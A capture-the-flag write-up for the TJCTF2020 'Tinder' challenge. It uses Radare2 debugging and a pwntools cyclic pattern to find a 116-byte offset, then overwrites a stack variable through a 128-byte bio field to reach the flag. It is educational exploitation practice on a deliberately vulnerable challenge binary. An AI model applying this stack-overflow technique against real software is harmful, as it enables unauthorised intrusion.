Tags: exploitation
Rating:
# Tinder | TJCTF2020
## Problem
Written by agcdragon
Start swiping! <--- binary included in link
## Solution
### 1. Run the binary and see what happens
```bash
kali@kali:~/Desktop/tjctf2020/tinder$ file match
match: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=20dc2329afce6884ca6bdae371f7af93bee637d5, with debug_info, not stripped
Welcome to TJTinder, please register to start matching!
Name: Jack
Username: jib1337
Password: password
Tinder Bio: hello
Registered 'jib1337' to TJTinder successfully!
Searching for matches...
Sorry, no matches found. Try Again!
```
Not much to go on.
### 2. Check it out in Radare2
In Radare2, we notice this amongst the code. An area of moment is compared to see if it matches a value. It then jumps to the location to print the flag if a match is found.
```bash
│ 0x080488cf e84cfeffff call sym.input
│ 0x080488d4 83c410 add esp, 0x10
│ 0x080488d7 83ec0c sub esp, 0xc ; .//match.c:56
│ 0x080488da 6a0a push 0xa ; 10 ; int c
│ 0x080488dc e89ffcffff call sym.imp.putchar ; int putchar(int c)
│ 0x080488e1 83c410 add esp, 0x10
│ 0x080488e4 817df40dd0d3. cmp dword [var_ch], 0xc0d3d00d ; .//match.c:58
│ ┌─< 0x080488eb 0f85b7000000 jne 0x80489a8
```
This is where is jumps to the flag function. So we need to overwrite this variable to be the value of 0xc0d3d00d.
Lets debug and find out what the state of everything is when it does the comparison.
```bash
kali@kali:~/Desktop/tjctf2020/tinder$ r2 -d match
Process with PID 2750 started...
= attach 2750 2750
bin.baddr 0x08048000
Using 0x8048000
asm.bits 32
glibc.fc_offset = 0x00148
Warning: r_bin_file_hash: file exceeds bin.hashlimit
[0xf7f770b0]> aaa
[x] Analyze all flags starting with sym. and entry0 (aa)
[x] Analyze function calls (aac)
[x] Analyze len bytes of instructions for references (aar)
[x] Check for objc references
[x] Check for vtables
[TOFIX: aaft can't run in debugger mode.ions (aaft)
[x] Type matching analysis for all functions (aaft)
[x] Propagate noreturn information
[x] Use -AA or aaaa to perform additional experimental analysis.
[0x080487ed]> db 0x080488e4
[0x080487ed]> dc
Welcome to TJTinder, please register to start matching!
Name: Jack
Username: jib1337
Password: password
Tinder Bio: hello
hit breakpoint at: 80488e4
[0x080488e4]> afvd
var var_ch = 0xffae2c5c = 0 <----------- This is what we need to change
var var_20h = 0xffae2c48 = 1801675082
var var_30h = 0xffae2c38 = 828533098
var var_40h = 0xffae2c28 = 1936941424
var var_80h = 0xffae2be8 = 1819043176
var var_8h = 0xffae2c60 = 4289604736
var var_10h = 0xffae2c58 = 4289604892
var var_a0h = 0xffae2bc8 = 134513276
arg arg_4h = 0xffae2bc4 = 4160227445
```
We can print the stack and see where we need to go.
```bash
[0x080488e4]> pxw @ esp
0xffae2bc0 0x0804837b 0xf7f80875 0x0804827c 0xffae2c3c {...u...|...<,..
0xffae2bd0 0xf7f9faa0 0x00000001 0xf7f6e410 0x00000001 ................
0xffae2be0 0x00000000 0x00000001 0x6c6c6568 0x0000006f ........hello...
0xffae2bf0 0x00000000 0x00c30000 0x00000001 0xf7f9e800 ................
0xffae2c00 0xffae2c50 0x00000000 0xf7f9f000 0x00000000 P,..............
0xffae2c10 0x00000000 0xffae2d14 0xf7f53000 0xf7f51a80 .....-...0......
0xffae2c20 0x00000000 0xf7f53000 0x73736170 0x64726f77 .....0..password
0xffae2c30 0xf7f50000 0xf7f86140 0x3162696a 0x00373333 [email protected].
0xffae2c40 0xf7f53300 0x00040000 0x6b63614a 0x08040000 .3......Jack....
0xffae2c50 0x00000001 0xffae2d14 0xffae2d1c 0x00000000 .....-...-...... <----------- This line here.
0xffae2c60 0xffae2c80 0x00000000 0x00000000 0xf7d91ef1 .,..............
0xffae2c70 0xf7f53000 0xf7f53000 0x00000000 0xf7d91ef1 .0...0..........
0xffae2c80 0x00000001 0xffae2d14 0xffae2d1c 0xffae2ca4 .....-...-...,..
0xffae2c90 0x00000001 0x00000000 0xf7f53000 0x00000000 .........0......
0xffae2ca0 0xf7f9f000 0x00000000 0xf7f53000 0xf7f53000 .........0...0..
0xffae2cb0 0x00000000 0xa6be3b64 0x48da5d74 0x00000000 ....d;..t].H....
```
We can do some stack telescoping to get an even better view.
```bash
[0x080488e4]> pxr @ esp
...
0xffae2c38 0x3162696a jib1 ascii ('j')
0xffae2c3c 0x00373333 337. ascii ('3')
0xffae2c40 0xf7f53300 .3..
0xffae2c44 0x00040000 ....
0xffae2c48 0x6b63614a Jack ascii ('J')
0xffae2c4c 0x08040000 ....
0xffae2c50 0x00000001 .... 1 (.comment)
0xffae2c54 0xffae2d14 .-.. ([stack]) stack R W 0xffae3508 --> ([stack]) stack R W 0x616d2f2e (./match) --> ascii ('.')
0xffae2c58 0xffae2d1c .-.. ([stack]) stack R W 0xffae3510 --> ([stack]) stack R W 0x4c454853 (SHELL=/bin/bash) --> ascii ('S')
0xffae2c5c ..[ null bytes ].. 00000000 <--------- RIGHT HERE!!!
0xffae2c60 0xffae2c80 .,.. ([stack]) stack R W 0x1 --> 1 (.comment)
0xffae2c64 ..[ null bytes ].. 00000000
0xffae2c6c 0xf7d91ef1 ....
0xffae2c70 0xf7f53000 .0..
0xffae2c74 0xf7f53000 .0..
0xffae2c78 ..[ null bytes ].. 00000000
0xffae2c7c 0xf7d91ef1 ....
0xffae2c80 0x00000001 .... 1 (.comment)
0xffae2c84 0xffae2d14 .-.. ([stack]) stack R W 0xffae3508 --> ([stack]) stack R W 0x616d2f2e (./match) --> ascii ('.')
0xffae2c88 0xffae2d1c .-.. ([stack]) stack R W 0xffae3510 --> ([stack]) stack R W 0x4c454853 (SHELL=/bin/bash) --> ascii ('S')
0xffae2c8c 0xffae2ca4 .,.. ([stack]) stack R W 0x0 --> 0 obj.imp.stdout
0xffae2c90 0x00000001 .... 1 (.comment)
0xffae2c94 ..[ null bytes ].. 00000000
0xffae2c98 0xf7f53000 .0..
0xffae2c9c ..[ null bytes ].. 00000000
0xffae2ca0 0xf7f9f000 .... (/usr/lib32/ld-2.30.so) library R W 0x28f24
0xffae2ca4 ..[ null bytes ].. 00000000
0xffae2ca8 0xf7f53000 .0..
0xffae2cac 0xf7f53000 .0..
0xffae2cb0 ..[ null bytes ].. 00000000
0xffae2cb4 0xa6be3b64 d;..
0xffae2cb8 0x48da5d74 t].H 0 obj.imp.stdout
0xffae2cbc ..[ null bytes ].. 00000000
```
We now know the value we need to overwrite. Time to try some stuff. It looks like we are roughly 20 bytes away from the address we need to overwrite. So I'll supply 20 input bytes and see where that gets us.
```bash
[0xf7fd10b0]> dc
Welcome to TJTinder, please register to start matching!
Name: aaaabbbbccccddddeeee
Username: jib1337
Password: password
Tinder Bio: hello
hit breakpoint at: 80488e4
[0x080488e4]> pxr @ esp
...
0xfff5f46c 0xf7faba80 ....
0xfff5f470 ..[ null bytes ].. 00000000
0xfff5f474 0xf7fad000 ....
0xfff5f478 0x73736170 pass ascii ('p')
0xfff5f47c 0x64726f77 word ascii ('w')
0xfff5f480 0xf7fa0000 ....
0xfff5f484 0xf7fe0140 @... (/usr/lib32/ld-2.30.so) library R X 'push ebp' 'ld-2.30.so'
0xfff5f488 0x3162696a jib1 ascii ('j')
0xfff5f48c 0x00373333 337. ascii ('3')
0xfff5f490 0xf7fad300 ....
0xfff5f494 0x00040000 ....
0xfff5f498 0x61616161 aaaa ascii ('a')
0xfff5f49c 0x62626262 bbbb ascii ('b')
0xfff5f4a0 0x63636363 cccc ascii ('c')
0xfff5f4a4 0x00646464 ddd. ascii ('d')
0xfff5f4a8 0xfff5f56c l... ([stack]) stack R W 0xfff61510 --> ([stack]) stack R W 0x4c454853 (SHELL=/bin/bash) --> ascii ('S')
0xfff5f4ac ..[ null bytes ].. 00000000
0xfff5f4b0 0xfff5f4d0 .... ([stack]) stack R W 0x1 --> 1 (.comment)
0xfff5f4b4 ..[ null bytes ].. 00000000
0xfff5f4bc 0xf7debef1 ....
...
```
Right, so we can't actually write past 15 bytes of input, not including the null byte. Looking back at the code, that makes sense. There is actally an input function which is used to recieve input from the user, and the max size of the input is given from eax each time.
```bash
[0x080487ed]> pdf @sym.input
; CALL XREFS from main @ 0x804884d, 0x8048877, 0x80488a1, 0x80488cf
┌ 205: sym.input (int32_t arg_8h);
│ ; var int32_t var_10h @ ebp-0x10
│ ; var int32_t var_ch @ ebp-0xc
│ ; var int32_t var_ah @ ebp-0xa
│ ; var int32_t var_4h @ ebp-0x4
│ ; arg int32_t arg_8h @ ebp+0x8
│ 0x08048720 55 push ebp ; .//match.c:19
│ 0x08048721 89e5 mov ebp, esp
│ 0x08048723 53 push ebx
│ 0x08048724 83ec14 sub esp, 0x14
│ 0x08048727 e8e4feffff call sym.__x86.get_pc_thunk.bx
│ 0x0804872c 81c3d4180000 add ebx, 0x18d4
│ 0x08048732 8b83f8ffffff mov eax, dword [ebx - 8] ; .//match.c:20
│ 0x08048738 8b10 mov edx, dword [eax]
│ 0x0804873a d9450c fld dword [ebp + 0xc]
│ 0x0804873d d983e8ebffff fld dword [ebx - 0x1418]
│ 0x08048743 dec9 fmulp st(1)
│ 0x08048745 d97df6 fnstcw word [var_ah]
│ 0x08048748 0fb745f6 movzx eax, word [var_ah]
│ 0x0804874c 80cc0c or ah, 0xc ; 12
│ 0x0804874f 668945f4 mov word [var_ch], ax
│ 0x08048753 d96df4 fldcw word [var_ch]
│ 0x08048756 db5df0 fistp dword [var_10h]
│ 0x08048759 d96df6 fldcw word [var_ah]
│ 0x0804875c 8b45f0 mov eax, dword [var_10h]
│ 0x0804875f 83ec04 sub esp, 4
│ 0x08048762 52 push edx ; FILE *stream
│ 0x08048763 50 push eax ; int size
│ 0x08048764 ff7508 push dword [arg_8h] ; char *s
│ 0x08048767 e884fdffff call sym.imp.fgets ; char *fgets(char *s, int size, FILE *stream)
│ 0x0804876c 83c410 add esp, 0x10
│ 0x0804876f 83ec0c sub esp, 0xc ; .//match.c:22
│ 0x08048772 ff7508 push dword [arg_8h] ; const char *s
│ 0x08048775 e8d6fdffff call sym.imp.strlen ; size_t strlen(const char *s)
│ 0x0804877a 83c410 add esp, 0x10
│ 0x0804877d 83f801 cmp eax, 1 ; 1
│ ┌─< 0x08048780 771c ja 0x804879e
│ │ 0x08048782 83ec0c sub esp, 0xc ; .//match.c:23
│ │ 0x08048785 8d8380eaffff lea eax, dword [ebx - 0x1580]
│ │ 0x0804878b 50 push eax ; const char *s
│ │ 0x0804878c e88ffdffff call sym.imp.puts ; int puts(const char *s)
│ │ 0x08048791 83c410 add esp, 0x10
│ │ 0x08048794 83ec0c sub esp, 0xc ; .//match.c:24
│ │ 0x08048797 6a00 push 0 ; int status
│ │ 0x08048799 e892fdffff call sym.imp.exit ; void exit(int status)
│ │ ; CODE XREF from sym.input @ 0x8048780
│ └─> 0x0804879e 83ec08 sub esp, 8 ; .//match.c:25
│ 0x080487a1 6a0a push 0xa ; 10 ; int c
│ 0x080487a3 ff7508 push dword [arg_8h] ; const char *s
│ 0x080487a6 e895fdffff call sym.imp.strchr ; char *strchr(const char *s, int c)
│ 0x080487ab 83c410 add esp, 0x10
│ 0x080487ae 85c0 test eax, eax
│ ┌─< 0x080487b0 751c jne 0x80487ce
│ │ 0x080487b2 90 nop ; .//match.c:26
│ │ ; CODE XREF from sym.input @ 0x80487ca
│ ┌──> 0x080487b3 8b83f8ffffff mov eax, dword [ebx - 8]
│ ╎│ 0x080487b9 8b00 mov eax, dword [eax]
│ ╎│ 0x080487bb 83ec0c sub esp, 0xc
│ ╎│ 0x080487be 50 push eax ; FILE *stream
│ ╎│ 0x080487bf e8ccfdffff call sym.imp.fgetc ; int fgetc(FILE *stream)
│ ╎│ 0x080487c4 83c410 add esp, 0x10
│ ╎│ 0x080487c7 83f80a cmp eax, 0xa ; 10
│ └──< 0x080487ca 75e7 jne 0x80487b3
│ ┌──< 0x080487cc eb19 jmp 0x80487e7
│ ││ ; CODE XREF from sym.input @ 0x80487b0
│ │└─> 0x080487ce 83ec0c sub esp, 0xc ; .//match.c:28
│ │ 0x080487d1 ff7508 push dword [arg_8h] ; const char *s
│ │ 0x080487d4 e877fdffff call sym.imp.strlen ; size_t strlen(const char *s)
│ │ 0x080487d9 83c410 add esp, 0x10
│ │ 0x080487dc 8d50ff lea edx, dword [eax - 1]
│ │ 0x080487df 8b4508 mov eax, dword [arg_8h]
│ │ 0x080487e2 01d0 add eax, edx
│ │ 0x080487e4 c60000 mov byte [eax], 0
│ │ ; CODE XREF from sym.input @ 0x80487cc
│ └──> 0x080487e7 90 nop ; .//match.c:30
│ 0x080487e8 8b5dfc mov ebx, dword [var_4h]
│ 0x080487eb c9 leave
└ 0x080487ec c3 ret
```
I put a breakpoint just before the fgets call and start the program.
```bash
[0xf7f420b0]> db 0x08048767
[0xf7f420b0]> dc
Welcome to TJTinder, please register to start matching!
Name: hit breakpoint at: 8048767
[0x08048767]> dr
eax = 0x00000010 <---------- this is equal to 16
ebx = 0x0804a000
ecx = 0xffffffff
edx = 0xf7f1e580
esi = 0xf7f1e000
edi = 0xf7f1e000
esp = 0xffa2f830
ebp = 0xffa2f858
eip = 0x08048767
eflags = 0x00000296
oeax = 0xffffffff
```
Without printing them all, all the max inputs for these inputs are 16, except for bio, which is 128. Lets test a theory here, providing 128 bytes of input to the bio.
```bash
[0xf7efe0b0]> db 0x080488e4
[0xf7efe0b0]> dc
Welcome to TJTinder, please register to start matching!
Name: Jack
Username: jib1337
Password: password
Tinder Bio: aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
hit breakpoint at: 80488e4
[0x080488e4]> pxr @ esp
0xffeb9080 0x0804837b {... @esp (/home/kali/Desktop/tjctf2020/tinder/match) (.dynstr) program R X 'pop edi' 'match' (__libc_start_main)
0xffeb9084 0xf7f07875 ux.. (/usr/lib32/ld-2.30.so) library R X 'add esp, 0x30' 'ld-2.30.so'
0xffeb9088 0x0804827c |... (/home/kali/Desktop/tjctf2020/tinder/match) (.dynsym) program R X 'jg 0x804827e' 'match'
0xffeb908c 0xffeb90fc .... ([stack]) stack R W 0x61616161 (aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa) --> ascii ('a')
0xffeb9090 0xf7f26aa0 .j.. (/usr/lib32/ld-2.30.so) library R W 0xf7ef53e0
0xffeb9094 0x00000001 .... 1 (.comment)
0xffeb9098 0xf7ef5410 .T..
0xffeb909c 0x00000001 .... 1 (.comment)
0xffeb90a0 ..[ null bytes ].. 00000000
0xffeb90a4 0x00000001 .... 1 (.comment)
0xffeb90a8 0x61616161 aaaa ascii ('a')
0xffeb90ac 0x61616161 aaaa ascii ('a')
0xffeb90b0 0x61616161 aaaa ascii ('a')
0xffeb90b4 0x61616161 aaaa ascii ('a')
0xffeb90b8 0x61616161 aaaa ascii ('a')
0xffeb90bc 0x61616161 aaaa ascii ('a')
0xffeb90c0 0x61616161 aaaa ascii ('a')
0xffeb90c4 0x61616161 aaaa ascii ('a')
0xffeb90c8 0x61616161 aaaa ascii ('a')
0xffeb90cc 0x61616161 aaaa ascii ('a')
0xffeb90d0 0x61616161 aaaa ascii ('a')
0xffeb90d4 0x61616161 aaaa ascii ('a')
0xffeb90d8 0x61616161 aaaa ascii ('a')
0xffeb90dc 0x61616161 aaaa ascii ('a')
0xffeb90e0 0x61616161 aaaa ascii ('a')
0xffeb90e4 0x61616161 aaaa ascii ('a')
0xffeb90e8 0x61616161 aaaa ascii ('a')
0xffeb90ec 0x61616161 aaaa ascii ('a')
0xffeb90f0 0x61616161 aaaa ascii ('a')
0xffeb90f4 0x61616161 aaaa ascii ('a')
0xffeb90f8 0x61616161 aaaa ascii ('a')
0xffeb90fc 0x61616161 aaaa ascii ('a')
0xffeb9100 0x61616161 aaaa ascii ('a')
0xffeb9104 0x61616161 aaaa ascii ('a')
0xffeb9108 0x61616161 aaaa ascii ('a')
0xffeb910c 0x61616161 aaaa ascii ('a')
0xffeb9110 0x61616161 aaaa ascii ('a')
0xffeb9114 0x61616161 aaaa ascii ('a')
0xffeb9118 0x61616161 aaaa ascii ('a')
0xffeb911c 0x61616161 aaaa ascii ('a')
0xffeb9120 0x61616161 aaaa ascii ('a')
0xffeb9124 0x00616161 aaa. ascii ('a')
0xffeb9128 ..[ null bytes ].. 00000000 ebp
0xffeb912c 0xf7d18ef1 ....
0xffeb9130 0xf7eda000 ....
...
[0x080488e4]> afvd
var var_ch = 0xffeb911c = 1633771873
var var_20h = 0xffeb9108 = 1633771873
var var_30h = 0xffeb90f8 = 1633771873
var var_40h = 0xffeb90e8 = 1633771873
var var_80h = 0xffeb90a8 = 1633771873
var var_8h = 0xffeb9120 = 1633771873
var var_10h = 0xffeb9118 = 1633771873
var var_a0h = 0xffeb9088 = 134513276
arg arg_4h = 0xffeb9084 = 4159731829
[0x080488e4]> dc
Registered 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' to TJTinder successfully!
Searching for matches...
Sorry, no matches found. Try Again!
child stopped with signal 11
[+] SIGNAL 11 errno=0 addr=0x6161615d code=1 ret=0
```
This is a good sign. The value we need to overwrite is now being overwritten through the bio input. Now I just have to work out how to make this work so we can win. We'll use a cyclic pattern to see how much input we need exactly.
```bash
kali@kali:~/Desktop$ python -c "from pwn import cyclic; print cyclic(128)"
aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaab
[0xf7f460b0]> db 0x080488e4
[0xf7f460b0]> dc
Welcome to TJTinder, please register to start matching!
Name: Jack
Username: jib1337
Password: password
Tinder Bio: aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaab
hit breakpoint at: 80488e4
[0x080488e4]> afvd
var var_ch = 0xffc6320c = 1650549093
var var_20h = 0xffc631f8 = 1633771897
var var_30h = 0xffc631e8 = 1633771893
var var_40h = 0xffc631d8 = 1633771889
var var_80h = 0xffc63198 = 1633771873
var var_8h = 0xffc63210 = 1650549094
var var_10h = 0xffc63208 = 1650549092
var var_a0h = 0xffc63178 = 134513276
arg arg_4h = 0xffc63174 = 4160026741
[0x080488e4]> pxr @ esp
0xffc63170 0x0804837b {... @esp (/home/kali/Desktop/tjctf2020/tinder/match) (.dynstr) program R X 'pop edi' 'match' (__libc_start_main)
0xffc63174 0xf7f4f875 u... (/usr/lib32/ld-2.30.so) library R X 'add esp, 0x30' 'ld-2.30.so'
0xffc63178 0x0804827c |... (/home/kali/Desktop/tjctf2020/tinder/match) (.dynsym) program R X 'jg 0x804827e' 'match'
0xffc6317c 0xffc631ec .1.. ([stack]) stack R W 0x61616176 (vaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaa) --> ascii ('v')
0xffc63180 0xf7f6eaa0 .... (/usr/lib32/ld-2.30.so) library R W 0xf7f3d3e0
0xffc63184 0x00000001 .... 1 (.comment)
0xffc63188 0xf7f3d410 ....
0xffc6318c 0x00000001 .... 1 (.comment)
0xffc63190 ..[ null bytes ].. 00000000
0xffc63194 0x00000001 .... 1 (.comment)
0xffc63198 0x61616161 aaaa ascii ('a')
0xffc6319c 0x61616162 baaa ascii ('b')
0xffc631a0 0x61616163 caaa ascii ('c')
0xffc631a4 0x61616164 daaa ascii ('d')
0xffc631a8 0x61616165 eaaa ascii ('e')
0xffc631ac 0x61616166 faaa ascii ('f')
0xffc631b0 0x61616167 gaaa ascii ('g')
0xffc631b4 0x61616168 haaa ascii ('h')
0xffc631b8 0x61616169 iaaa ascii ('i')
0xffc631bc 0x6161616a jaaa ascii ('j')
0xffc631c0 0x6161616b kaaa ascii ('k')
0xffc631c4 0x6161616c laaa ascii ('l')
0xffc631c8 0x6161616d maaa ascii ('m')
0xffc631cc 0x6161616e naaa ascii ('n')
0xffc631d0 0x6161616f oaaa ascii ('o')
0xffc631d4 0x61616170 paaa ascii ('p')
0xffc631d8 0x61616171 qaaa ascii ('q')
0xffc631dc 0x61616172 raaa ascii ('r')
0xffc631e0 0x61616173 saaa ascii ('s')
0xffc631e4 0x61616174 taaa ascii ('t')
0xffc631e8 0x61616175 uaaa ascii ('u')
0xffc631ec 0x61616176 vaaa ascii ('v')
0xffc631f0 0x61616177 waaa ascii ('w')
0xffc631f4 0x61616178 xaaa ascii ('x')
0xffc631f8 0x61616179 yaaa ascii ('y')
0xffc631fc 0x6261617a zaab ascii ('z')
0xffc63200 0x62616162 baab ascii ('b')
0xffc63204 0x62616163 caab ascii ('c')
0xffc63208 0x62616164 daab ascii ('d')
0xffc6320c 0x62616165 eaab ascii ('e') <---------- RIGHT HERE!!!
0xffc63210 0x62616166 faab ascii ('f')
0xffc63214 0x00616167 gaa. ascii ('g')
kali@kali:~/Desktop$ python -c "from pwn import cyclic_find; print(cyclic_find(0x62616165))"
116
```
### 3. Get the flag
Our payload is 116 bytes, followed by the little endian of 0xc0d3d00d. We can try it offline first (see solve.py).
```python
kali@kali:~/Desktop/tjctf2020/tinder$ python solve.py
[+] Starting local process './match': pid 3702
Welcome to TJTinder, please register to start matching!
Name:
Username:
Password:
Tinder Bio:
[*] Process './match' stopped with exit code 0 (pid 3702)
Registered 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA���' to TJTinder successfully!
Searching for matches...
It's a match!
Flag File is Missing. Contact a moderator if running on server.
```
Cool, looks like it works. Then we just run it on the server to win!
```bash
kali@kali:~/Desktop/tjctf2020/tinder$ python solve.py REMOTE
[+] Starting local process './match': pid 3702
Welcome to TJTinder, please register to start matching!
Name:
Username:
Password:
Tinder Bio:
[*] Process './match' stopped with exit code 0 (pid 3702)
Registered 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA���' to TJTinder successfully!
Searching for matches...
It's a match!
Here is your flag: tjctf{0v3rfl0w_0f_m4tch35}
```
